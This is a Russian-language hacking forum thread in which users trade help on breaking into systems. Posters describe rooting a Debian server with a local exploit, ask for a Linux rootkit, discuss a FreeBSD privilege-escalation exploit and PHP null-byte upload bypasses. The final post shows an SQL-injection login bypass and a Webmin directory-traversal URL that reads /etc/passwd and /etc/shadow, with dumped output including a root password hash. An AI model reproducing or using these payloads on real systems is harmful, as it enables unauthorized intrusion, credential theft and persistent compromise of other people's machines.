
31.10.2009, 13:33
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
С нами:
9520453
Репутация:
124
|
|
Сообщение от LokbatanLi
Gorev, nu pocti ti menya i ya tebya ponel kak blind sql budet??
Blind-injection рассмотрена в статье, ссылку на которую я давал несколькими постами выше.
|
|
|

31.10.2009, 14:53
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Подскажите,запускаю локал рут сплойт на шеле пишет
No job control on this shell
Система Debian Linux yesclub 2.6.18-6-686. Cплойт собран на OpenSuse 11,причём её он с радостью порутал =)
В чём трабла?
P.s. я понимаю,что не хочет работать на этом шеле,вопрос почему?
P.S.S. Уффф,порутал. =)
Зыыы Посоветуйте свежий паблик (можно и не паблик =)) руткит под Linx Debian с сцылкой желательно и выложите,если у кого есть, ваниш собранный,никак не хочет компилиься. =( С меня репа =)
Последний раз редактировалось p.r0phe.t; 31.10.2009 в 16:10..
|
|
|

31.10.2009, 17:28
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами:
9679872
Репутация:
347
|
|
кто либо пользовался этим эксплойтом http://milw0rm.com/exploits/7581 ?
(FreeBSD 6x/7 protosw kernel Local Privledge Escalation Exploit)
написано запускать так: usage: ./x <allproc>\n
что за параметр allproc?
|
|
|

31.10.2009, 17:55
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами:
8947056
Репутация:
229
|
|
Null байт не действует при аплоаде в систему виндувс? (php)
Последний раз редактировалось wolmer; 31.10.2009 в 18:04..
|
|
|

31.10.2009, 20:24
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
В функциях copy() и move_uploaded_file() null-байт работает, если же он экранируется, то можно воспользоваться тем, что php проводит нормализацию пути и обрезает значение по превышении MAXPATHLEN:
On Windows OS move_uploaded_file function will convert "foo.php"
followed by one or more of the chars \x2E (.), \x2F (/), \x5C (\)
back to "foo.php"
|
|
|

01.11.2009, 09:45
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами:
8947056
Репутация:
229
|
|
Сообщение от [Raz0r]
если же он экранируется, то можно воспользоваться тем, что php проводит нормализацию пути и обрезает значение по превышении MAXPATHLEN
Можно поподробней о этом? (+ с примером если можно)
milw0rm.com/papers/359 - не знаю англ язык
(strtolower не должен влиять на Null байт по идее?)
Последний раз редактировалось wolmer; 01.11.2009 в 10:04..
|
|
|

01.11.2009, 10:19
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
С нами:
9520453
Репутация:
124
|
|
Сообщение от wolmer
Можно поподробней о этом? (+ с примером если можно)
milw0rm.com/papers/359 - не знаю англ язык
(strtolower не должен влиять на Null байт по идее?)
Почитай данную статью . =)
|
|
|

01.11.2009, 11:02
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами:
8947056
Репутация:
229
|
|
Что-то не получается заюзать (с точкой), нужен пример с POST'ом
|
|
|

01.11.2009, 13:42
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947
Репутация:
1196
|
|
Сообщение от wolmer
(strtolower не должен влиять на Null байт по идее?)
а самому подумать?
в %00 - нет буквенных символов , чтоб переводить в нижний регистр
|
|
|

31.10.2009, 22:02
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
С нами:
8984365
Репутация:
45
|
|
Не знаю, тут ли постю. Если что - прошу прощения. Ранее получал доступ в админку по линку http://192.168.0.1. В логин или пароль (1' or 1=1/*) и получил права. Спалили, поменяли. Поставил админ WEBMIN. Приконектився к 10000 порту. Скуль не проходит. Нарыл такую вот штуку
PHP код:
http://192.168.0.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd
показывает это (урывок): root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
И такую:
PHP код:
http://192.168.0.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow
Показывает такое (урывок):
root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7:::
bin:*:14346:0:99999:7:::
daemon:*:14346:0:99999:7:::
adm:*:14346:0:99999:7:::
lp:*:14346:0:99999:7:::
sync:*:14346:0:99999:7:::
shutdown:*:14346:0:99999:7:::
halt:*:14346:0:99999:7:::
mail:*:14346:0:99999:7:::
news:*:14346:0:99999:7:::
uucp:*:14346:0:99999:7:::
Можно логин-пароль найти в этих данных?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|